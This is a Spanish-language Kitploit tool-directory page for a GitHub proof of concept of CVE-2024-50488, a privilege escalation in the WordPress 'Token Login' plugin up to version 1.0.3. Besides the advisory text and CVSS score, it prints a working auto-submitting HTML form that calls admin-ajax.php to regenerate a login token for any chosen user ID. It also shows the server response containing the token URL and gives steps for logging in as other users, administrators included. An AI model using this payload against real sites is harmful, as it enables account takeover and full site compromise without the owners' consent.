Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - Escalada de privilegios autenticada (Suscriptor+) | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-50488
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - Escalada de privilegios autenticada (Suscriptor+)

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50488

Token Login <= 1.0.3 - Escalada de privilegios autenticada (Suscriptor+)

Descripción:

El complemento Auto Login using a secure tokenized url. Role wise login restriction. para WordPress es vulnerable a la escalada de privilegios mediante la apropiación de cuentas en todas las versiones hasta, e incluyendo, la 1.0.3. Esto se debe a que el complemento no verifica correctamente si un usuario tiene permisos para generar un token de inicio de sesión para otros usuarios. Esto hace posible que atacantes autenticados, con acceso de nivel suscriptor y superior, inicien sesión como otros usuarios, incluidos los administradores.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login

POC

Con la sesión iniciada, ejecuta este HTML submit. Cambia la URL al sitio de WordPress en el que has iniciado sesión. Cambia el ID al usuario para el que quieres generar el token. Copia la URL y podrás iniciar sesión como ese usuario.

root@kitploit:~
<html>
  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />
      <input type="hidden" name="method" value="regenerate&#95;token" />
      <input type="hidden" name="user&#95;id" value="7" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Respuesta

root@kitploit:~
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}
Descargar herramienta